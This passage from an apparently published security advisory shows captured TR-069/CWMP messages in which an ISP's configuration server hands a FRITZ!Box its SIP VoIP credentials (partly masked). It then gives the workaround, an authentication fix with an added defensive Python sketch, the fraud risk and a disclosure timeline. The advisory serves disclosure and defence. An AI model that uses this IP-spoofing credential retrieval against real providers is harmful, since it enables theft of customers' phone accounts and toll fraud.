<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
[msg14] CPE -> ACS B:  
---------------------  
  
[empty]  
  
[msg15] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[3]">  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.PeriodicInformEnable  
</Name>  
<Value xsi:type="xsd:boolean">1</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
PeriodicInformInterval  
</Name>  
<Value xsi:type="xsd:unsignedInt">38888</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.PeriodicInformTime  
</Name>  
<Value xsi:type="xsd:dateTime">  
2014-09-08T10:49:21+1:00  
</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315849</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
[msg16] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg17] CPE <- ACS B:  
---------------------  
  
[empty]  
  
[msg18] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[1]">  
<EventStruct>  
<EventCode>6 CONNECTION REQUEST</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:36+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string">39315849</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg19] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg20] CPE -> ACS B:  
---------------------  
  
[empty]  
  
[msg21] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158500</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string">  
20140908xxxxxx-0896D776FAA2-78.48.x.x  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.Capabilities.  
X_AVM-DE_UsePSTN  
</Name>  
<Value xsi:type="xsd:boolean">0</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315850</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg22] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158500</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg23] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158501</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[13]">  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Enable  
</Name>  
<Value xsi:type="xsd:string">Enabled</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.Enable  
</Name>  
<Value xsi:type="xsd:string">Enabled</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.X_AVM-DE_UseAuthUsername  
</Name>  
<Value xsi:type="xsd:boolean">0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.X_AVM-DE_CLIRType  
</Name>  
<Value xsi:type="xsd:int">5</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.PSTNFailOver  
</Name>  
<Value xsi:type="xsd:boolean">0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.DTMFMethod  
</Name>  
<Value xsi:type="xsd:string">RFC2833</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.OutboundProxy  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.UserAgentDomain  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.RegistrarServer  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.SIP.ProxyServer  
</Name>  
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.AuthPassword  
</Name>  
<Value xsi:type="xsd:string">0241463xxxxxxxxx</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.DirectoryNumber  
</Name>  
<Value xsi:type="xsd:string">463xxxxx</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.  
1.Line.1.SIP.AuthUserName  
</Name>  
<Value xsi:type="xsd:string">49241463xxxxx</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315850</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg24] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158501</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg25] CPE <- ACS B:  
---------------------  
  
[empty]  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
o2 implemented countermeasures that prevent attackers from spoofing a  
victim's IP address in CWMP messages. This prevents attackers from  
retrieving arbitrary o2 customers' VoIP credentials.  
  
  
Fix  
===  
  
The CPE needs to be properly authenticated when communicating with the  
ACS. One way to do so would be to have the CPE present the password of  
the DSL connection. This password is already known to the CPE, as the  
customer entered it manually during the initial setup process.  
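
As an added illustration of the workaround and the fix described above (example code written for this page, not o2's ACS or any code from RedTeam Pentesting), the following Python sketch shows an ACS-side check that ties a CWMP session to a per-customer secret, such as a hash of the DSL password, instead of trusting an IP address carried inside the message. The Inform message, serial numbers, IP addresses, passwords and the `ExternalIPAddress` parameter path are constructed for the example; in a real deployment the peer address comes from the HTTP or TLS front end and the credential from the CPE's HTTP authentication on the CWMP session.

```python
"""ACS-side CWMP session checks: do not identify a customer by an IP
address found in the message; require a credential only that customer's
CPE knows, and reject messages whose claimed address does not match the
transport peer."""
import hashlib
import hmac
import os
import xml.etree.ElementTree as ET

NS = {
    "soap": "http://schemas.xmlsoap.org/soap/envelope/",
    "cwmp": "urn:dslforum-org:cwmp-1-0",
}


def hash_secret(secret: str, salt: bytes) -> bytes:
    """Derive a verifier from the DSL password; only the verifier is stored."""
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 100_000)


def make_record(dsl_password: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "verifier": hash_secret(dsl_password, salt)}


# Constructed customer database (hypothetical serials and passwords).
CUSTOMERS = {
    "CPE-VICTIM-001": make_record("victim-dsl-pw"),
    "CPE-OTHER-002": make_record("other-dsl-pw"),
}


def build_inform(serial: str, claimed_ip: str) -> str:
    """Constructed minimal CWMP Inform, shaped like the captured messages."""
    return f"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
  <soap:Header><cwmp:ID soap:mustUnderstand="1">1</cwmp:ID></soap:Header>
  <soap:Body>
    <cwmp:Inform>
      <DeviceId><OUI>000000</OUI><SerialNumber>{serial}</SerialNumber></DeviceId>
      <ParameterList>
        <ParameterValueStruct>
          <Name>InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1.ExternalIPAddress</Name>
          <Value>{claimed_ip}</Value>
        </ParameterValueStruct>
      </ParameterList>
    </cwmp:Inform>
  </soap:Body>
</soap:Envelope>"""


def parse_inform(xml_text: str) -> dict:
    """Extract the device serial and the IP address the CPE claims to have."""
    root = ET.fromstring(xml_text)
    inform = root.find("soap:Body", NS).find("cwmp:Inform", NS)
    serial = (inform.findtext("DeviceId/SerialNumber") or "").strip()
    claimed_ip = None
    for pvs in inform.findall("ParameterList/ParameterValueStruct"):
        name = (pvs.findtext("Name") or "").strip()
        if name.endswith("ExternalIPAddress"):
            claimed_ip = (pvs.findtext("Value") or "").strip()
    return {"serial": serial, "claimed_ip": claimed_ip}


def verify_cpe(xml_text: str, peer_ip: str, auth_user: str, auth_password: str):
    """Return (accepted, reason) for one CWMP Inform on a session.

    peer_ip is the real TCP/TLS source address seen by the ACS front end;
    auth_user/auth_password are the CPE's HTTP credentials on the session.
    """
    info = parse_inform(xml_text)
    rec = CUSTOMERS.get(info["serial"])
    if rec is None or auth_user != info["serial"]:
        return (False, "unknown-device")
    # An address inside the message is attacker-controlled data; it must
    # agree with the address the packets actually came from.
    if info["claimed_ip"] != peer_ip:
        return (False, "ip-mismatch")
    # Prove possession of the customer's DSL password (constant-time compare).
    candidate = hash_secret(auth_password, rec["salt"])
    if not hmac.compare_digest(candidate, rec["verifier"]):
        return (False, "bad-credential")
    return (True, "ok")


if __name__ == "__main__":
    good = build_inform("CPE-VICTIM-001", "78.48.0.1")
    print(verify_cpe(good, "78.48.0.1", "CPE-VICTIM-001", "victim-dsl-pw"))
    # Same message replayed from another address is refused.
    print(verify_cpe(good, "203.0.113.7", "CPE-VICTIM-001", "victim-dsl-pw"))
```

The address comparison alone is not sufficient where customers sit behind carrier-grade NAT or share an address; the credential check is the part that actually binds the session to one customer, which is why the advisory's fix asks for CPE authentication rather than a stronger address check.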
  
  
Security Risk  
=============  
  
This vulnerability allows the unauthorised use of other customers' VoIP  
telephone numbers. The victim will be charged for all costs resulting  
from fraudulent phone calls. Furthermore, an attacker may answer phone  
calls on behalf of the victim. Customers have no means of defending  
themselves against such an attack. Chances are that the attack will only  
be noticed by customers who regularly check their invoice. The  
vulnerability is therefore considered to pose a high risk.  
  
  
Timeline  
========  
  
2014-09-08 - Potential vulnerability discovered  
2014-09-20 - Vulnerability verified  
2014-10-17 - ISP was notified about the vulnerability  
2014-10-17 - ISP implemented first countermeasures  
2014-10-24 - ISP wants to investigate further  
2014-11-28 - ISP needs more time, depends on hardware manufacturer  
2015-01-23 - ISP is still investigating, wants to permanently solve the  
problem  
2015-03-31 - ISP is still working on the problem, asks for more time  
2015-06-12 - ISP wants to notify the proper German authorities about the  
problem first while working on a solution  
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,  
BSI)  
2016-01-08 - Advisory released  
  
  
References  
==========  
  
[0] https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. In this way, security weaknesses  
in company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
--   
RedTeam Pentesting GmbH        Tel.: +49 241 510081-0  
Dennewartstr. 25-27            Fax : +49 241 510081-99  
52068 Aachen                   https://www.redteam-pentesting.de  
Germany                        Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`